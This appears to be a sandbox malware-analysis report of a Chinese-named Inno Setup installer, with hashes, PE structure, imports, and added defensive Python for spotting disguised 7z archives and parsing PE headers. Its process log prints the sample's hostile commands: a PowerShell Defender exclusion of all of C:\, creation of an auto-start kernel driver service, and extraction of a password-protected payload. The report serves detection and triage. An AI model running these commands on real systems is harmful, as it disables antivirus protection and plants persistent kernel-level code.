                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:dropped
                                                          Size (bytes):406
                                                          Entropy (8bit):5.117520345541057
                                                          Encrypted:false
                                                          SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                                          MD5:9200058492BCA8F9D88B4877F842C148
                                                          SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                                          SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                                          SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                                          Malicious:false
                                                          Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
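The 7zr.exe console output above records that locale3.dat is really a 7z archive (Method LZMA2/LZMA/BCJ2 with 7zAES, Physical Size 31890, Headers Size 354), which is the "non-matching file extension" behaviour listed in the signatures. The block below is an added example, not Joe Sandbox code and not the dropper's own logic: it parses the 32-byte 7z signature header so that a renamed archive is recognised by content, and cross-checks the size arithmetic against the values in the log. The header bytes are constructed inline for the example; the archive itself is not available here.

```python
"""Recognise a 7z archive by its signature header, whatever the file is named."""
import struct
import zlib

SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"      # first 6 bytes of every 7z archive
SIGNATURE_HEADER_LEN = 32


def parse_7z_signature_header(data: bytes):
    """Return the fields of the 7z signature header, or None if not a valid one.

    Layout (little-endian):
        magic[6] | major,minor[2] | StartHeaderCRC[4] |
        NextHeaderOffset[8] | NextHeaderSize[8] | NextHeaderCRC[4]
    StartHeaderCRC is CRC32 over the last 20 bytes, so a truncated or patched
    header is rejected instead of producing garbage offsets.
    """
    if len(data) < SIGNATURE_HEADER_LEN or data[:6] != SEVENZ_MAGIC:
        return None
    major, minor = data[6], data[7]
    (start_crc,) = struct.unpack_from("<I", data, 8)
    if zlib.crc32(data[12:32]) & 0xFFFFFFFF != start_crc:
        return None                                # corrupt or truncated header
    next_off, next_size, next_crc = struct.unpack_from("<QQI", data, 12)
    return {
        "version": (major, minor),
        "next_header_offset": next_off,            # relative to end of signature header
        "next_header_size": next_size,
        "next_header_crc": next_crc,
        # 7-Zip's "Physical Size": signature header + packed streams + next header
        "physical_size": SIGNATURE_HEADER_LEN + next_off + next_size,
    }


def is_disguised_7z(filename: str, data: bytes) -> bool:
    """True when the content is a valid 7z archive but the name does not say so."""
    return (parse_7z_signature_header(data) is not None
            and not filename.lower().endswith(".7z"))


def build_sample_header(next_off: int, next_size: int, next_crc: int = 0) -> bytes:
    """Constructed test input: a signature header only, with no packed data behind it."""
    tail = struct.pack("<QQI", next_off, next_size, next_crc)
    start_crc = struct.pack("<I", zlib.crc32(tail) & 0xFFFFFFFF)
    return SEVENZ_MAGIC + bytes([0, 4]) + start_crc + tail


# Sizes taken from the 7zr output above: Physical Size 31890 and Headers Size 354,
# so the packed streams between the two headers occupy 31890 - 32 - 354 = 31504 bytes.
SAMPLE_LOCALE3 = build_sample_header(next_off=31504, next_size=354)

if __name__ == "__main__":
    print(parse_7z_signature_header(SAMPLE_LOCALE3))
    print("disguised:", is_disguised_7z("locale3.dat", SAMPLE_LOCALE3))
```

The signature header only tells you that the file is a 7z container and where its property header sits; whether the streams use 7zAES (as the log shows) is recorded in the coder list inside that next header, which 7-Zip may itself store encoded or encrypted, so a "password-protected" verdict needs a full 7z parser or the 7z tool. For triage, content-based magic detection plus the extension mismatch is already enough to flag a .dat that the installer then hands to a bundled 7zr.exe.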
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.921329426572819
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 98.04%
                                                          • Inno Setup installer (109748/4) 1.08%
                                                          • InstallShield setup (43055/19) 0.42%
                                                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                          File name:#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                          File size:5'707'472 bytes
                                                          MD5:c17bd872bfa6b9e26aa03ad02ceaaca0
                                                          SHA1:a2cc5d1e3526ad5b415ba875b12e1e42d48411ce
                                                          SHA256:43a0b8a907d46b77e8695c8c00f90a6812f9bdb138d2ae53c1ce0d9b4362e610
                                                          SHA512:16c469e4e465b49c65d248cbc255e14f10e592c69f34284027a459839a129eb37ca75535369993a8d2aa8ce211e5b35974e13f64632257b37efd468b98d61f5f
                                                          SSDEEP:98304:XwREaHL2dH4jfHA43cQSl6GZkZmRzbmeoDWgo6UqI3J+LZotAVtfc0MJsI1dMwZO:lWmH4jfH7dSl6GZkM1Keo6gPUJOoiPMU
                                                          TLSH:98461222F3CBE43EE05D1B3716B2A25494FB7A606522AD5396ECB4ACCF350601D3E647
                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                          Icon Hash:0c0c2d33ceec80aa
                                                          Entrypoint:0x4a83bc
                                                          Entrypoint Section:.itext
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:1
                                                          File Version Major:6
                                                          File Version Minor:1
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:1
                                                          Import Hash:40ab50289f7ef5fae60801f88d4541fc
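The static fields above (Entrypoint 0x4a83bc in .itext, Imagebase 0x400000, Time Stamp 0x6690DABD, DLL Characteristics DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE, OS version 6.1, subsystem windows gui) all come straight out of the IMAGE_FILE_HEADER, IMAGE_OPTIONAL_HEADER and section table. As an added example, and not Joe Sandbox's own parser, the block below reads those headers with plain struct unpacking, maps the entry point RVA to its section and decodes the timestamp and characteristics bitmask. The input is a constructed headers-only image carrying the values reported above; it contains no code from the sample and the section sizes are assumptions chosen so that the entry point falls in .itext, not values from the report.

```python
"""Decode the static PE header fields shown in the report from raw bytes."""
import struct
from datetime import datetime, timezone

DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}


def parse_pe(data: bytes) -> dict:
    """Parse DOS/NT headers and the section table; supports PE32 and PE32+."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    fh = e_lfanew + 4                                        # IMAGE_FILE_HEADER
    machine, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20                                            # IMAGE_OPTIONAL_HEADER
    (magic,) = struct.unpack_from("<H", data, opt)
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)  # AddressOfEntryPoint
    if magic == 0x10B:                                       # PE32: 32-bit ImageBase
        (image_base,) = struct.unpack_from("<I", data, opt + 28)
    elif magic == 0x20B:                                     # PE32+: 64-bit ImageBase
        (image_base,) = struct.unpack_from("<Q", data, opt + 24)
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)

    sections = []
    for i in range(nsec):                                    # IMAGE_SECTION_HEADER x nsec
        off = opt + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va = struct.unpack_from("<II", data, off + 8)
        sections.append((name, va, vsize))
    entry_section = next((n for n, va, vs in sections if va <= entry_rva < va + vs), None)

    return {
        "machine": machine,
        "entrypoint": image_base + entry_rva,
        "entrypoint_section": entry_section,
        "imagebase": image_base,
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "os_version": f"{os_major}.{os_minor}",
        "timestamp_utc": datetime.fromtimestamp(stamp, tz=timezone.utc)
                                 .strftime("%a %b %d %H:%M:%S %Y UTC"),
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items())
                                if dll_chars & bit],
    }


def build_sample_pe() -> bytes:
    """Constructed headers-only image with the values reported above (no code, no data)."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                  # e_lfanew
    # Machine i386, 2 sections, TimeDateStamp, SizeOfOptionalHeader 0xE0,
    # Characteristics EXECUTABLE_IMAGE | 32BIT_MACHINE
    file_hdr = struct.pack("<HHIIIHH", 0x014C, 2, 0x6690DABD, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt, 16, 0x0A83BC)                # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)                # ImageBase
    struct.pack_into("<HH", opt, 40, 6, 1)                   # OS version 6.1
    struct.pack_into("<HH", opt, 68, 2, 0x8140)              # GUI; DYNAMIC_BASE|NX_COMPAT|TS_AWARE

    def section(name: bytes, va: int, vsize: int) -> bytes:
        return name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, va, 0, 0, 0, 0, 0, 0,
                                                  0x60000020)  # CODE|EXECUTE|READ
    # Section sizes are assumptions for the example, not values from the report.
    secs = section(b".text", 0x1000, 0xA6000) + section(b".itext", 0xA7000, 0x2000)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + secs


if __name__ == "__main__":
    for k, v in parse_pe(build_sample_pe()).items():
        print(f"{k}: {v:#x}" if isinstance(v, int) else f"{k}: {v}")
```

The timestamp decode is the check worth keeping: a build time of July 2024 on an installer seen in December 2024 is plausible, whereas a stamp far in the future or at the epoch is a common sign of a patched header. An entry point inside .itext rather than .text, with DYNAMIC_BASE and NX_COMPAT set, is the normal shape of a Delphi/Inno Setup bootstrapper, which matches the TrID guess above and is not by itself suspicious.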
                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          add esp, FFFFFFA4h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          xor eax, eax
                                                          mov dword ptr [ebp-3Ch], eax
                                                          mov dword ptr [ebp-40h], eax
                                                          mov dword ptr [ebp-5Ch], eax
                                                          mov dword ptr [ebp-30h], eax
                                                          mov dword ptr [ebp-38h], eax
                                                          mov dword ptr [ebp-34h], eax
                                                          mov dword ptr [ebp-2Ch], eax
                                                          mov dword ptr [ebp-28h], eax
                                                          mov dword ptr [ebp-14h], eax
                                                          mov eax, 004A2EBCh
                                                          call 00007FBBE9312BD5h
                                                          xor eax, eax
                                                          push ebp
                                                          push 004A8AC1h
                                                          push dword ptr fs:[eax]
                                                          mov dword ptr fs:[eax], esp
                                                          xor edx, edx
                                                          push ebp
                                                          push 004A8A7Bh
                                                          push dword ptr fs:[edx]
                                                          mov dword ptr fs:[edx], esp
                                                          mov eax, dword ptr [004B0634h]
                                                          call 00007FBBE93A455Bh
                                                          call 00007FBBE93A40AEh
                                                          lea edx, dword ptr [ebp-14h]
                                                          xor eax, eax
                                                          call 00007FBBE939ED88h
                                                          mov edx, dword ptr [ebp-14h]
                                                          mov eax, 004B41F4h
                                                          call 00007FBBE930CC83h
                                                          push 00000002h
                                                          push 00000000h
                                                          push 00000001h
                                                          mov ecx, dword ptr [004B41F4h]
                                                          mov dl, 01h
                                                          mov eax, dword ptr [0049CD14h]
                                                          call 00007FBBE93A00B3h
                                                          mov dword ptr [004B41F8h], eax
                                                          xor edx, edx
                                                          push ebp
                                                          push 004A8A27h
                                                          push dword ptr fs:[edx]
                                                          mov dword ptr fs:[edx], esp
                                                          call 00007FBBE93A45E3h
                                                          mov dword ptr [004B4200h], eax
                                                          mov eax, dword ptr [004B4200h]
                                                          cmp dword ptr [eax+0Ch], 01h
                                                          jne 00007FBBE93AB2CAh
                                                          mov eax, dword ptr [004B4200h]
                                                          mov edx, 00000028h
                                                          call 00007FBBE93A09A8h
                                                          mov edx, dword ptr [004B4200h]
                                                          Name                                  Virtual Address  Virtual Size  Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT          0xb7000          0x71          .edata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT          0xb5000          0xfec         .idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE        0xcb000          0x11000       .rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC       0xba000          0x10fa8       .reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS             0xb9000          0x18          .rdata
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT             0xb52d4          0x25c         .idata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0xb6000          0x1a4         .didata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                          Name     Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
                                                          .text    0x1000           0xa568c       0xa5800   b889d302f6fc48a904de33d8d947ae80  False     0.3620185045317221   data       6.377190161826806   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .itext   0xa7000          0x1b64        0x1c00    588dd0a8ab499300d3701cbd11b017d9  False     0.548828125          data       6.109264411030635   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .data    0xa9000          0x3838        0x3a00    5c0c76e77aef52ebc6702430837ccb6e  False     0.35338092672413796  data       4.95916338709992    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .bss     0xad000          0x7258        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .idata   0xb5000          0xfec         0x1000    627340dff539ef99048969aa4824fb2d  False     0.380615234375       data       5.020404933181373   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .didata  0xb6000          0x1a4         0x200     fd11c1109737963cc6cb7258063abfd6  False     0.34765625           data       2.729290535217263   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .edata   0xb7000          0x71          0x200     7de8ca0c7a61668a728fd3a88dc0942d  False     0.1796875            data       1.305578535725827   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .tls     0xb8000          0x18          0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rdata   0xb9000          0x5d          0x200     d84006640084dc9f74a07c2ff9c7d656  False     0.189453125          data       1.3892750148744617  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc   0xba000          0x10fa8       0x11000   a85fda2741bd9417695daa5fc5a9d7a5  False     0.5789579503676471   data       6.709466460182023   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          .rsrc    0xcb000          0x11000       0x11000   d767418641bf302610db416464cb7807  False     0.18785903033088236  data       3.721360641780582   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          Name           RVA      Size    Type                                                                                Language  Country        ZLIB Complexity
                                                          RT_ICON        0xcb678  0xa68   Device independent bitmap graphic, 64 x 128 x 4, image size 2048                    English   United States  0.1174924924924925
                                                          RT_ICON        0xcc0e0  0x668   Device independent bitmap graphic, 48 x 96 x 4, image size 1152                     English   United States  0.15792682926829268
                                                          RT_ICON        0xcc748  0x2e8   Device independent bitmap graphic, 32 x 64 x 4, image size 512                      English   United States  0.23387096774193547
                                                          RT_ICON        0xcca30  0x128   Device independent bitmap graphic, 16 x 32 x 4, image size 128                      English   United States  0.39864864864864863
                                                          RT_ICON        0xccb58  0x1628  Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors  English   United States  0.08339210155148095
                                                          RT_ICON        0xce180  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors   English   United States  0.1023454157782516
                                                          RT_ICON        0xcf028  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors   English   United States  0.10649819494584838
                                                          RT_ICON        0xcf8d0  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors    English   United States  0.10838150289017341
                                                          RT_ICON        0xcfe38  0x12e5  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                         English   United States  0.8712011577424024
                                                          RT_ICON        0xd1120  0x4228  Device independent bitmap graphic, 64 x 128 x 32, image size 16896                  English   United States  0.05668398677373642
                                                          RT_ICON        0xd5348  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9600                    English   United States  0.08475103734439834
                                                          RT_ICON        0xd78f0  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4224                    English   United States  0.09920262664165103
                                                          RT_ICON        0xd8998  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1088                    English   United States  0.2047872340425532
                                                          RT_STRING      0xd8e00  0x3f8   data                                                                                                          0.3198818897637795
                                                          RT_STRING      0xd91f8  0x2dc   data                                                                                                          0.36475409836065575
                                                          RT_STRING      0xd94d4  0x430   data                                                                                                          0.40578358208955223
                                                          RT_STRING      0xd9904  0x44c   data                                                                                                          0.38636363636363635
                                                          RT_STRING      0xd9d50  0x2d4   data                                                                                                          0.39226519337016574
                                                          RT_STRING      0xda024  0xb8    data                                                                                                          0.6467391304347826
                                                          RT_STRING      0xda0dc  0x9c    data                                                                                                          0.6410256410256411
                                                          RT_STRING      0xda178  0x374   data                                                                                                          0.4230769230769231
                                                          RT_STRING      0xda4ec  0x398   data                                                                                                          0.3358695652173913
                                                          RT_STRING      0xda884  0x368   data                                                                                                          0.3795871559633027
                                                          RT_STRING      0xdabec  0x2a4   data                                                                                                          0.4275147928994083
                                                          RT_RCDATA      0xdae90  0x10    data                                                                                                          1.5
                                                          RT_RCDATA      0xdaea0  0x310   data                                                                                                          0.6173469387755102
                                                          RT_RCDATA      0xdb1b0  0x2c    data                                                                                                          1.1818181818181819
                                                          RT_GROUP_ICON  0xdb1dc  0xbc    data                                                                                English   United States  0.6170212765957447
                                                          RT_VERSION     0xdb298  0x584   data                                                                                English   United States  0.2804532577903683
                                                          RT_MANIFEST    0xdb81c  0x7a8   XML 1.0 document, ASCII text, with CRLF line terminators                            English   United States  0.3377551020408163
                                                          DLL           Import
                                                          kernel32.dll  GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                          comctl32.dll  InitCommonControls
                                                          user32.dll    CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                          oleaut32.dll  SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                          advapi32.dll  ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                                          Name                 Ordinal  Address
                                                          __dbk_fcall_wrapper  2        0x40fc10
                                                          dbkFCallWrapperAddr  1        0x4b063c
                                                          Language of compilation system  Country where language is spoken
                                                          English                         United States
                                                          No network behavior found

                                                          Target ID:0
                                                          Start time:01:42:16
                                                          Start date:23/12/2024
                                                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
                                                          Imagebase:0x470000
                                                          File size:5'707'472 bytes
                                                          MD5 hash:C17BD872BFA6B9E26AA03AD02CEAACA0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:01:42:16
                                                          Start date:23/12/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
                                                          Imagebase:0x860000
                                                          File size:3'366'912 bytes
                                                          MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:01:42:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                          Imagebase:0x7ff6e3d50000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:01:42:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:01:42:18
                                                          Start date:23/12/2024
                                                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
                                                          Imagebase:0x470000
                                                          File size:5'707'472 bytes
                                                          MD5 hash:C17BD872BFA6B9E26AA03AD02CEAACA0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:01:42:18
                                                          Start date:23/12/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$40418,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
                                                          Imagebase:0xaa0000
                                                          File size:3'366'912 bytes
                                                          MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Borland Delphi
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:01:42:21
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:01:42:21
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:01:42:22
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:01:42:22
                                                          Start date:23/12/2024
                                                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                                          Imagebase:0xf00000
                                                          File size:831'200 bytes
                                                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          • Detection: 0%, Virustotal
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:01:42:22
